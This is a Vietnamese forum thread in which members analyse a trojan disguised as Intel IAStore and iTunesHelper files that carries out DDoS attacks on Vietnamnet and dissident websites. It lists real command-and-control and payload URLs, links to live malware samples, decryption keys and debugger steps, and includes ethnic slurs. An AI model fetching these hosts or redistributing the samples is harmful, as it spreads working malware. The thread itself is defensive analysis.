Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi.
Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.
|
|
|
|
Kinh thật, code khá lắm, 1 file exe đăng ký run như 1 service, 5 file dll, mỗi thằng 1 nhiệm vụ khác nhau. Thằng làm trách nhiệm download là thằng IAStoreUIHelp.dll. Tất cả chúng phối hợp nhuần nhuyễn với nhau.
Bạn 1visao có nhớ là tại sao, khi nào, download cái gì mà máy trên công ty này của bạn bị dính đám mạo danh IAStore này không ?
Bà con ơi, tiếp tục up mẫu thôi. Toàn bộ đống mạo danh IAStore này em đã up ở đây: http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé.
Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi.
À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !
|
|
|
|
Hì hì, thằng nằm vùng down về là cái đống .exe và .dll mà 1visao vừa post đấy anh, hên thế, sao 1visao có hết và up đúng y chang luôn vậy ha ? Dù bạn là ai, có mục đích gì thì tôi cũng phải cảm ơn bạn, và đừng giận tôi vì những nghi ngờ của tôi nhé. Thời buổi loạn hết rồi, khó tin ai được nữa, thông cảm bạn nhé !
@ 1visao: Đúng rồi đó bạn, tôi đã down đống dll đấy về, một đám nằm vùng của bọn stl đấy. Bạn taskkill và delete hết thư mục đấy đi nhé !
Thằng khỉ coder này, sao đi đâu mày cũng CString hết vậy, bộ chỉ biết dùng CString thôi à ? Là em PatchDiff với cái idb của toàn bộ ATLMFC lib "mệt bỏ xừ". Nhưng bù lại code của CString thì nhiều, code của thằng coder này thì ít, có vài dòng à !
À mà quên, tôi có đề nghị nhỏ thế này nè, khi các bạn reply, đừng quote nguyên xi post của người khác, nặng thêm. Vừa rồi tôi về miền Tây, duyệt HVA = GPRS, thấy chậm và dài, lâu lắm.
|
|
|
|
Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh ! Và iTunesHelper.exe cũng chính là version mới, còn data.mdf cũng là iTunesHelper.exe version củ.
Bà con debug và rce file k113.css mà em vừa up lên mediafire sẽ thấy. k113.css khi run sẽ extract ra iTunesHelper.exe và iTunesHelper-tray.exe.
2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi.
Cậu up giùm tui các file .dll sau:
1. IAStorCommon.dll
2. IAStorUIHelper.dll
3. IAStorDataMgr.dll
4. SmartPin.dll
5. SysInftLib.dll
Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi.
Đúng rồi 1visao à, của stl rồi. Thằng exe này sẽ lấy buffer content mà 1 trong các dll trên download về, parse, lấy nội dung, giãi mã, ghi xuống file rồi CreateProcessA.
Khốn nạn thật, đâu mà nhiều "mèo què" của stl thế này không biết. Tụi mày có cả mấy chục thằng code mèo què à ?
|
|
|
|
2 anh conmale: ws2_32.dll là file của MS anh à, không cần đâu.
Sẵn tiện quãng cáo hàng luôn: trong file DecodeSTLVirus.zip của em có 1 file ws2_32.dll. File này là file dll proxy, đứng trung gian giữa .EXE và ws2_32.dll của MS trong System32 dir.
Mọi lệnh call hàm API tới ws2_32.dll của MS sẽ đi qua ws2_32.dll này, nó sẽ bắt và ghi hết lại thành 1 file pcap, sau đó nó mới forward call tới ws2_32.dll thật của MS.
Anh cứ chép file ws2_32.dll của em vào cùng thư mục với con trojan, run hay monitor tuỳ thích với trình netword sniffer anh đang dùng. Trong thư mục đấy sẽ có 1 file .cap là PCAP file đấy.
Em dùng NetwordMiner để mở và analyze file PCAP này.
2 1visao: Cảm ơn bạn, tôi đã xem file AutoRuns của bạn, chỉ có thằng iTunesxxx mà ta đã biết và 2 file .exe trên mà anh conmale đã đề cập là nghi ngờ. Cậu up giùm 2 file .exe đó lên mediafire luôn nhé !
Đọc file Autoruns của bạn thấy bạn install phần mềm nhiều lắm rồi, còn rác "File not found" nhiều quá. Dùng chính Autoruns xoá đi bạn, gỡ bỏ Symantec và AVG đi, install Avira Personal Free là được rồi, cập nhật nhanh.
Ngày hôm qua phải mất gần nữa ngày diệt virus cho máy laptop của đứa em họ, máy nó dùng AVG, chỉ có thằng fake AV "Security Protection" không mà diệt không được. Cuối cùng em phải diệt bằng tay rồi dùng USB KIS scan và diệt.
Em đã up file k113.css lên Avira, FSecure, MS, KIS... Chặn từ gốc luôn, down về là bị chụp liền.
|
|
|
|
Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về.
Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ.
RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được.
PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi:
Code:
http://wide.ircop.cn
http://pref.firebay.cn
http://daily.leteaks.com
http://link.susaks.com
http://option.drfound.net
Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này 
|
|
|
|
Lại chia buồn mấy anh stl người Việt bán nước và mấy thằng tàu khựa. Em đã giãi mã ra file txt của anh rồi. Lần này mấy anh chơi mã hoá CAST128/256 cho tất cả hardcode strings trong exe của mấy anh và trong txt lấy về.
Key encrypt và decrypt của mấy anh đây:
1. hArd9zlOtY5wU89-: cho hard code string trong exe
2. qjJw4afl979K4quE20pcDhgk8YGbyB: để giãi mã file index.txt down về
Dưới đây là 3 hình ảnh minh hoạ file text index.txt sau khi được giãi mã trên bộ nhớ:
Lần này hết chối nhé mấy thằng tàu khựa và mấy thằng Vietnam phản động bán nước.
Bà con nên để ý kỹ cái link gạch đỏ cuối cùng, hình số 3, thằng nằm vùng sẽ download thằng trojan: http://option.drfound.net/k113.css này về vào thư mục %temp%iTunes.tmp. File này em đã nhanh tay down về và up lên mediafire + file index.txt đã giãi mã sơ bộ: http://www.mediafire.com/?acqlw6ywkcva3a8
Bây giờ em buồn ngủ rồi, ngày mai rảnh thì em sẽ code tool decode, còn lười thì post hướng dẫn debug cho nhanh. Bà con thông cảm nhé !
Với các bà con dùng OllyDbg, bà con load ituneshelper.exe vào OllyDbg, patch tại address 0040D5EA từ push 60000 thành push 0 (chứ không thì nó "ngủ" đến 1 phút lận). Sau đó đặt breakpoint tại: 0040D812, rồi Run (F9)
Khi OllyDbg break, quan sát nội dung memory mà thanh ghi ECX trỏ đến là ta có mệnh lệnh DDOS Vietnamnet đã được giãi mã:
Có được rồi thì terminate OllyDbg liền, đừng run gì nữa.
|
|
|
|
|
2 totden: Dĩ nhiên rồi, code C++ mà dùng WTL, ATL, MFC, std, boost thì RCE cực bỏ xừ. Nhưng nếu quen và đã từng code, debug trên các library đó thì sẽ dể dàng hơn.
|
|
|
|
Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C.
Avira đã có trả lời, mới up hồi chiều, nhanh thật: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=809945
Bạn 1visao vui lòng up giùm file Autoruns của bạn, vì chắc chắn trên máy bạn còn 1 thằng nằm vùng khác download ituneshelper.exe về. File data.mdf cũng chính là ituneshelper.exe nhưng có version cũ hơn.
Tức là lúc đầu con nằm vùng đó download ituneshelper.exe ver cũ về, sau đó một thời gian, nó kết nối tới đâu đó, thấy có lệnh cập nhật, nó down ituneshelper.exe mới về, kill process ituneshelper.exe cũ, rename, copy ituneshelper.exe mới vào thư mục ban đầu rồi run, đăng ký autorun. Và sẽ có một website nào đó nữa ta chưa biết chứa con trojan và file ra lệnh cập nhật này.
PS: Em nói đúng không mấy anh stl. RCE code mấy anh riết ngán quá rồi 
|
|
|
|
Đặc sệt code của stl coder, CString + zlib + encode tá lã.
Lần này, mấy anh lại đi ăn cắp code nữa rồi mấy anh, libcurl chơi bê nguyên xi vậy à ? Hay là bản chất đại ca tàu khựa của mấy anh ăn cắp quen rồi nên mấy anh chỉ biết dùng đồ ăn cắp hay nhiểm ăn cắp luôn rồi.
Em gặp nhiều "mèo què" rồi, nhưng chưa bao giờ gặp đám "mèo què" nào như của tụi anh, đạo code, mạo danh các ct nổi tiếng. Hèn, hèn, hèn hạ hết chổ nói. Đx, chỉ biết nói thêm một câu, "khốn nạn", nhưng nói rồi thấy hình như chưa đủ "đô".
Em tức quá chửi luôn: bà con cẩn thận, tụi stl này giãy giụa, vùng vẫy, cắn càn như một đám chó điên rồi bị người dân dồn và đập rồi, ai đụng tới tụi nó thì tụi nó hết trò, chỉ biết ddos đáp trả thôi.
Run nó lên, nó sleep một đỗi rồi bắt đầu ồ ạt tấn công liền 1 loạt 3 địa chỉ của Vietnamet. Em đang rce đoạn code giải mã file .txt của nó.
|
|
|
|
Mình cũng đang ngờ ngợ:
1. Down của 1visao về, KIS chụp cổ hết.
2. Bạn 1visao join HVA từ 12/06/2004, tới giờ mới chỉ có 1 bài post.
Dù gì, cũng cảm ơn 1visao. Đang analyze nó, tạm tắt KIS.
|
|
|
|
Sáng nay, kiểm tra lại thử target DDOS của mấy anh stl, thấy mấy anh đã loại danlambao.blogspot.vn ra khỏi danh sách.
Tới giờ, content của backgrounds.jpg: http://net.iadze.com/backgrounds.jpg và showthread.php: http://net.iadze.com/showthread.php đã hoàn toàn giống nhau.
Danh sách các site đang bị DDOS:
Code:
http://www.aihuuphuyen.org
http://nguoiduatinkami.wordpress.com
http://vrvradio.com
http://aotrangoi.com
http://viettan.org
http://dangviettan.wordpress.com
http://radiochantroimoi.com
http://radiochantroimoi.wordpress.com
http://chutungo.wordpress.com
http://nguoivietphanlan.forumotion.com
http://exodusforvietnam.wordpress.com
Sao không đốt danlambao nữa mấy anh ? Chán rồi à !
Hiện tại, sau khi kiểm tra các file GoogleCrashHandler.exe và dll mà các bạn gởi lên, tôi tạm xác định đấy là các file sạch của Google, và xin lỗi các bạn.
Nếu các bạn kiểm tra các file đó có Digital Signature của Google thì có thể "tạm" yên tâm, không cần upload.
Vậy là tới đây chúng ta vẫn chưa tìm được mẫu đang ddos Vietnamnet.
Mong bà con tiếp tục dùng TCPView và SmartSniff: http://www.nirsoft.net/utils/smsniff.html để tiếp tục monitor và tìm exe nào đang ddos Vietnamnet.
PS: 2 hailua_online: Cậu up giùm tôi các file này nhé:
1. c:\program files\common files\adobe\switchboard\switchboard.exe
2. c:\program files\internet download manager\idman.exe
Cảm ơn trước.
|
|
|
|
Thông tin thêm: http://www.exe-dll.com/process/googleupdate.exe.htm
Các bạn chú ý cái link abobeupdate.com, đọc lại topic đầu tiên RCE virus của stl sẽ thấy cái link này.
Các bạn search và up GoogleUpdater.exe, GoogleCrashHandler.exe, goopdate.dll.
|
|
|
|
|
Cứ up lên mediafire hay đâu đó đi em. Cái bat file anh viết đâu có tìm GoogleCrashHandler đâu ?
|
|
|
|
|
Tình hình rất ừ là tình hình, đang ngồi trên máy chờ bà con tìm và up goopdate.dll lên nè, bà con ơi.
|
|
|
|
Cảm ơn Semperidem. Chắc đúng rồi đó em, mẫu mới, build ngày 07/07/2011, mới toanh nhất. Cũng code theo kiểu C++ dùng CString của VS 2008.
Còn thiếu một file quan trong nữa, em search trên máy tìm thấy GoogleCrashHandler.exe đó, file goopdate.dll, up lên liền nhé. Tôi đợi, vì ngày mai tôi phải đi xa vài ngày rồi. Có file này thì hy vọng sẽ lòi ra nguồn ddos server của stl vào vietnamnet.
|
|
|
|
Cảm ơn vndncn. Nhắc mới nhớ, mình có thằng bạn nằm vùng trong giới RCE, đang làm trong team Windows Defender. Hì hì, gởi riêng cho nó toàn bộ "mèo què" của mấy anh stl này mới được.
Hỏi riêng mấy anh stl cái: Em gởi mẫu cho MS có bị cấm, bị bắt không mấy anh ? Không thì mấy anh chụp mũ em tiết lộ bí mật xxx, thông tin xxx gì đó nữa, tội em lắm ?
Bà con nào biết, kiểm tra giùm em IP 113.172.223.104 (IP của VDC), lúc 2:39 chiều, ngày hôm nay: 22-08-2011, là của thằng nào ? PM riêng cho em nhé !
|
|
|
|
Không cần thiết viết thêm đâu anh, chỉ cần ghi chú là bà con login hay RunAs file cmd trên với quyền Admin là được. Chạy 1 lần, press any key vài lần, sau đó login vào user thường dùng, chạy 1 lần, press any key vài lần nữa là xong.
- taskkill: Kill process đang run của exe cần del.
- sc delete: Delete service mà exe cần kill đăng ký
- Xong xuôi, del nó đi là vừa.
Em xin báo cáo với mấy anh stl, Avira vừa report về cho em, toàn bộ AcrobatUpdater.exe, SbieSvc.exe, SbieMgm.dll mà em đã up cho Avira đã được Avira báo là "mèo què".
1. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=806250
2. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=806248
Thêm nữa, chiều nay, KIS của em tự đông nhai xương hết toàn bộ mấy file trên trong thư mục: Virus\STL trên máy em rồi.
Từ từ rồi toàn bộ 100% các "mèo què" của mấy anh sẽ bị các AVs phổ biến tiêu diệt hết. Thử xem lúc đó mấy anh còn "đốt chích" được ai.
PS: Bỏ cái trò comment hù doạ trên cái bờ lốc bỏ hoang của em đi nhé, mấy anh stl. Chơi vậy là hèn lắm đấy. Đấu với nhau bằng kỷ thuật không lại giờ quay ra hù doạ em à ? Hu hu, em sợ quá, mấy anh tha cho em  
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
